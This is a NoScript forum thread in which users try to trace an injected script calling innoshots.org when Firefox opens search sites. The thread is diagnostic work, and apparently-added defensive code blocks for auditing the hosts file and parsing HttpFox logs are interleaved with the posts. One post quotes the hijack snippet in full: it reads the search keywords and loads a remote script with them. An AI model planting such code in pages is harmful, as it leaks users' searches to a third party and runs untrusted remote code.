RESOLVED Strange script tries to run when connection is down

Post by therube »

That works nonetheless.
You could have put it in a [ code ] tag.

Key Word Search perhaps. And ".live". We have that other thread where "live" was being injected into gmx.net. Coincidence perhaps.

Code:

try{$("form .lsb").live("click",function(e){var kws=$("input.lst").val();$("#t0").remove();var script=document.createElement('script');script.id="t0";script.src="http://29.innoshots.org/ffeed.php?kws=" + kws + "&n=26606B673930206A616D37783C3F3F382026222A32607F73255D2E5E595B2F2E131964111D1114131E1168131919166D02000570720506730A1F59574A584C027771642220287B766E26393D293F737A7E60743F3027093265687C3830332A00055C53451353525A584F2F243E&r=5725";document.getElementsByTagName('body')[0].appendChild(script);});}catch(err){}	
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.19) Gecko/20110420 SeaMonkey/2.0.14 Pinball NoScript FlashGot AdblockPlus
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.4) Gecko/20091017 SeaMonkey/2.0
Post by therube »

Oh. You've got IETAB. Does that like mean that IE is running embedded in FF :oops:.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.19) Gecko/20110420 SeaMonkey/2.0.14 Pinball NoScript FlashGot AdblockPlus
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.4) Gecko/20091017 SeaMonkey/2.0
Post by Montagar »

therube wrote:Oh. You've got IETAB. Does that like mean that IE is running embedded in FF :oops:.
Not if you don't turn it on, and it only uses the IE rendering engine for the specific FF tab that you turn it on for, not across all tabs.

Also, Tom T. was able to recreate this situation and he did not have IE Tab installed.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)
Post by GµårÐïåñ »

Just to share something with you all that might be relevant. A few weeks back a legit site was found serving malware and they had no idea. It turns out they were showing an "AD" for someone who paid for it but was embedded with an encoded link serving up malware simply by being shown. This wasn't caught by the staff that loaded the ad on their site until people reported it. They took it down, apologized for not noticing but goes to show that there are tons of ways to make it happen. It could very well have been someone who is voluntarily serving the link up (may show up in google or yahoo results page, which would also serve it as well) by simply being archived even and it will take time to scrub it. One way to see if this is a possibility is to find out the commonalities of the search terms used by the people who experienced it and see if there is a common denominator that can help track down the source. Just saying but the hard part is that most search engines return so much and often unrelated sites in search results that no way to know.
~.:[ Lï£ê ï§ å Lêmðñ åñÐ Ì Wåñ† M¥ Mðñê¥ ßå¢k ]:.~
________________ .: [ Major Mike's ] :. ________________
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.4) Gecko/20091016 Firefox/3.5.4
Post by Tom T. »

@Giorgio: FWIW, I still can no longer reproduce the issue, with configuration identical to my previous post, all add-ons enabled.
The innoshot script does *not* try to load when I connect live to the sites in question.

A DNS hijack might be a culprit, no? But then, how can the script try to load with no connection? :?:
OP appears to be US-based, as am I, but with a different ISP. Perhaps my ISP discovered this issue and resolved it, and Montagar's has not?

FWIW, I just searched the Registry for "innoshot", and found nothing. Perhaps OP should try this also?

@ Guardian:
If I have all ads blocked, and <IFRAME> blocked, then could it still do this?
If it were a new ad domain not yet in my blocklist, then I would have seen the ad. Since I am accustomed to seeing none, I feel fairly certain that any such ad would have caught my eye. Anytime a new advertiser appears, I r-click the image and it is added to Adblock Original block list.

Edit: Guardian:
may show up in google or yahoo results page,
But OP and I *never saw a results page* -- with no connection, how could one show? It was *merely the attempt to connect to the site*, with no connection, that triggered the script attempting to load. No results or ads possible.

Also, yahoo.com is not a search engine alone, but their home page, which includes a search box, as many sites do. Again, no searches were performed by either OP or myself to reproduce the issue.

FWIW.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20
Post by Giorgio Maone »

Tom T. wrote:A DNS hijack might be a culprit, no? But then, how can the script try to load with no connection? :?:
Both NoScript and Adblock Plus intercept requests before they hit the network. Therefore you can see networked destinations even though they won't be reached because you're offline.
Tom T. wrote:
OP appears to be US-based, as am I, but with a different ISP. Perhaps my ISP discovered this issue and resolved it, and Montagar's has not?
If it was an ISP problem your DNS wouldn't resolve (unless we're hitting a cached entry). Therefore we can probably rule out an ISP issue.

Tom T. wrote:
FWIW, I just searched the Registry for "innoshot", and found nothing. Perhaps OP should try this also?
I'd check also:
  1. My hosts file
  2. My proxy settings
Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.4) Gecko/20091016 Firefox/3.5.4 (.NET CLR 3.5.30729)
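As an added example (not part of Giorgio Maone's post and not NoScript code), here is one way to run the hosts-file check suggested above: parse the file and report any entry that points one of the affected sites at an address other than a blocklist sink. The watched domains, the sink addresses and the sample hosts text are assumptions made for this illustration; 203.0.113.7 is a documentation-range address.

```javascript
// Added example: audit hosts-file text for overrides of watched domains.
// WATCHED and SINKS are assumptions chosen for this thread, not a standard list.
const WATCHED = ["google.com", "yahoo.com", "ask.com"];
const SINKS = new Set(["0.0.0.0", "127.0.0.1", "::1"]);

// Turn hosts-file text into { line, address, name } records.
function parseHosts(text) {
  const entries = [];
  text.split(/\r?\n/).forEach((raw, i) => {
    const line = raw.split("#")[0].trim(); // drop comments and blank lines
    if (!line) return;
    const [address, ...names] = line.split(/\s+/);
    for (const name of names) {
      // One line may map several names to the same address.
      entries.push({ line: i + 1, address, name: name.toLowerCase() });
    }
  });
  return entries;
}

// Exact match or true subdomain only, so "notask.com" is not "ask.com".
function isWatched(name) {
  return WATCHED.some((d) => name === d || name.endsWith("." + d));
}

// A watched name mapped to a sink is ordinary ad blocking; a watched name
// mapped anywhere else redirects that site and needs explaining.
function auditHosts(text) {
  return parseHosts(text).filter((e) => isWatched(e.name) && !SINKS.has(e.address));
}

// Constructed sample, not taken from any poster's machine.
const SAMPLE_HOSTS = [
  "# constructed sample",
  "127.0.0.1       localhost",
  "0.0.0.0         www.google-analytics.com pagead2.googlesyndication.com",
  "0.0.0.0         ads.google.com   # blocklist entry",
  "203.0.113.7     www.google.com www.yahoo.com",
  "203.0.113.7     notask.com",
].join("\n");

for (const f of auditHosts(SAMPLE_HOSTS)) {
  console.log(`line ${f.line}: ${f.name} -> ${f.address}`);
}
```
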
Post by Montagar »

Tom T. wrote:FWIW, I just searched the Registry for "innoshot", and found nothing. Perhaps OP should try this also?
I just searched the registry for "innoshot" and found nothing.

This has really got me scratching my head... something that resides on my computer that is undetected by anti-virus/anti-malware programs, and injects itself in an attempt to run a script from another site when FF tries to access www.google.com, www.yahoo.com or www.ask.com, even with no network cable attached to the computer. :?
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)
Post by Tom T. »

Giorgio Maone wrote: If it was an ISP problem your DNS wouldn't resolve (unless we're hitting a cached entry). Therefore we can probably rule out an ISP issue.
Aha? IIRC, nearly all ISPs cache common domains (can't get much more common than Google or Yahoo), but with a fairly short expiration/refresh time, to handle IP changes. Perhaps my ISP had these cached with the infection, and so did OP's, but mine had a shorter expiration time, which is why I no longer see it?
Tom T. wrote:
FWIW, I just searched the Registry for "innoshot", and found nothing. Perhaps OP should try this also?
Giorgio Maone wrote:I'd check also:
  1. My hosts file
  2. My proxy settings
therube wrote:HOSTS file?
Tom T. wrote: I'll check. (searches Hosts for "innoshot") Nope. There are various listings of Google variations, but they are *all* set to redirect to 0.0.0.0, which is a non-existent address.
I don't use a proxy. Home network > router > modem > ISP.

Edit @ Giorgio: Or did you mean locally cached on the machine?
I have Windows DNS Client disabled. Attempting "dns /?" from command prompt gives "not recognized command..."

And Fx Options > Advanced > Network > Connection > Settings is checked "Direct connection to the Internet".
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20
Post by GµårÐïåñ »

The ad image itself was just a facade and is often blocked, it was the embedded script that due to the trusted parent website was allowed to run on many machines which created a locally accessible redundant file that allowed it from that point forth to run independently and without need for the browser really, although it hooks IE once on the machine and runs as part of explorer.exe which is allowed by all av/firewall solutions pretty much by default. This was noticed actually due to a poorly implemented design model by the developer of the malware who did not include a "online" check (meaning do we have internet access?) before running, causing it to show up when people were not connected and issuing errors, which made it known. From a purely programming perspective, a shame that such a successful attempt failed due to careless error trapping and checks; otherwise, it could have effectively run indefinitely without being detected. Oh well.
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.4) Gecko/20091016 Firefox/3.5.4
Post by Tom T. »

GµårÐïåñ wrote:it was the embedded script that due to the trusted parent website was allowed to run
Interesting. But the script in question was not under the Yahoo domain, it was under innoshot.com. Neither OP nor I ever allowed innoshot, so how can it load and infect the machine?

And why would it spontaneously disappear from mine?

As for the attack you mentioned, yes, it's good that bad people are (often but not always) stupid or careless people. ;)
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20
Post by GµårÐïåñ »

No my friend, that's not what I meant. I am sorry. Let me try to clarify.

1. Legit site (yahoo, google, informaction, etc, etc) accepts to post ad code for client X
2. Client X embeds a script inside its ad and when you allow legit site (the parent in this case) it will allow it to run the code
3. The code is to something illegit or possibly fishy (badsite, bot, clicker, p0rn, or in this case possibly innoshot)

Did I make clear what I meant by allowing the parent? The ultimate payload is not the parent, it's the surrogate that got allowed by the parent by inheriting its permissions. Also keep in mind, this is based on technical experience speculation and it could end up being as wrong as Bill Gates' statement regarding memory a decade ago. You never know with technology.

So far I was happy to see that some of the things Giorgio suggested were in line with what I presented as possibilities, so in that there is some degree of satisfaction, even if our ultimate speculation is wrong and turns out to be something benign that was overlooked. All else fails, the discussion here alone will be eye opening to some, reinforce others and hopefully help some with better understanding of the massive amount of possibilities that are available to a good programmer. Luckily, most of us are not malicious.
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.4) Gecko/20091016 Firefox/3.5.4
Post by Tom T. »

(The continuing discussion with Guardian was split and moved to forum NoScript Development, as it was more about preventing such things in the future via enhancements to NS capability and usability. Getting off-topic to OP, which has yet to be resolved.)
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20
Post by Montagar »

I would rather not have to wipe out FF completely and install FF from scratch, but I am running out of ideas. Does anyone have any suggestions as to what else I can try to attempt to find out where this script is coming from?

It's clearly a fact that it is something on the computer itself, but I am still trying to determine if it's "in" FF or not.

I know this has gone somewhat beyond a NoScript support issue, but I think that working this issue out might help other users as well.

Thanks

Edit by Tom T: I'll ask Giorgio to get back on it. I'm doing this as an edit rather than a reply, so that your name is visible on the boards as last poster rather than mine, as more attention-getting (OP still having issue).
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.4) Gecko/20091016 Firefox/3.5.4 (.NET CLR 3.5.30729)
Post by Giorgio Maone »

Please install the HttpFox, record your session and copy all the rows here.
Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.4) Gecko/20091016 Firefox/3.5.4 (.NET CLR 3.5.30729)
Post by Montagar »

Giorgio Maone wrote:Please install the HttpFox, record your session and copy all the rows here.
Not familiar with this add-on, but I think the following is what you asked for, but since NoScript is blocking the innoshots script, none of that info shows up.

00:00:29.739 0.058 612 0 GET null Redirect (cached) http://www.google.com/
00:00:29.810 0.154 612 3234 GET 200 text/html http://www.google.com/
00:00:29.970 0.112 642 8817 GET 200 image/gif http://www.google.com/intl/en_ALL/images/logo.gif
00:00:30.067 0.124 724 10926 GET 200 text/javascript http://www.google.com/extern_js/f/CgJlbhICdXMrMAo4QkAILCswDjgJLCswFjgQLCswFzgELCswGDgELCswGTgJLCswJTjJiAEsKzAmOAUsKzAnOAIsKzAqOAIsKzArOAcsKzA8OAAs/thnq-wiJ9NI.js
00:00:30.193 0.015 632 0 GET null Redirect (cached) http://clients1.google.com/generate_204
00:00:30.244 0.066 632 144 GET 204 text/html http://clients1.google.com/generate_204
00:00:30.323 0.065 635 5660 GET 200 image/png http://www.google.com/images/nav_logo7.png
00:00:30.336 0.122 752 209 GET 204 text/html http://www.google.com/csi?v=3&s=webhp&action=&tran=undefined&e=17259,21590,21766,21930,22107,22217,22243,22525&ei=xhvuSpbYGp-2NM_ckbAN&rt=prt.20,xjs.244,ol.371
00:00:30.360 0.065 593 1464 GET 200 image/x-icon http://www.google.com/favicon.ico
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.4) Gecko/20091016 Firefox/3.5.4 (.NET CLR 3.5.30729)
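An added example, not part of Montagar's post and not HttpFox code: a small parser for rows pasted in the format above that separates requests to the visited site from requests to any other host, which is the question this recording was meant to answer. The column order is assumed from the shape of the rows in this thread, and the last sample row is constructed to show what an unblocked request to the host from the quoted script would look like.

```javascript
// Added example: triage of pasted HttpFox rows.
// Assumed column order (inferred from the rows in this thread):
// started, duration, sent, received, method, result, type, URL.
// The type column may contain spaces, e.g. "Redirect (cached)".
const ROW = /^(\S+)\s+(\S+)\s+(\d+)\s+(\d+)\s+(\S+)\s+(\S+)\s+(.+?)\s+(\S+)$/;

function parseHttpFox(text) {
  const rows = [];
  for (const line of text.split(/\r?\n/)) {
    const m = ROW.exec(line.trim());
    if (!m) continue; // not a request row (signature, blank line, ...)
    let host;
    try { host = new URL(m[8]).hostname; } catch (e) { continue; }
    rows.push({ started: m[1], received: Number(m[4]), method: m[5],
                result: m[6], type: m[7], url: m[8], host });
  }
  return rows;
}

// Requests whose host is neither the visited site nor one of its subdomains.
function offSiteRequests(rows, siteDomain) {
  return rows.filter(
    (r) => r.host !== siteDomain && !r.host.endsWith("." + siteDomain));
}

// Per-host totals, so an unexpected host stands out at a glance.
function summarizeByHost(rows) {
  const byHost = {};
  for (const r of rows) {
    const s = byHost[r.host] || (byHost[r.host] = { requests: 0, bytes: 0, types: [] });
    s.requests += 1;
    s.bytes += r.received;
    if (!s.types.includes(r.type)) s.types.push(r.type);
  }
  return byHost;
}

const SAMPLE_LOG = [
  "00:00:29.739 0.058 612 0 GET null Redirect (cached) http://www.google.com/",
  "00:00:29.810 0.154 612 3234 GET 200 text/html http://www.google.com/",
  "00:00:30.244 0.066 632 144 GET 204 text/html http://clients1.google.com/generate_204",
  "00:00:30.360 0.065 593 1464 GET 200 image/x-icon http://www.google.com/favicon.ico",
  // Constructed row, not from the recording in this thread:
  "00:00:31.002 0.090 540 0 GET null text/javascript http://29.innoshots.org/ffeed.php?kws=test",
].join("\n");

const sampleRows = parseHttpFox(SAMPLE_LOG);
for (const r of offSiteRequests(sampleRows, "google.com")) {
  console.log(`off-site: ${r.started} ${r.type} ${r.url}`);
}
```
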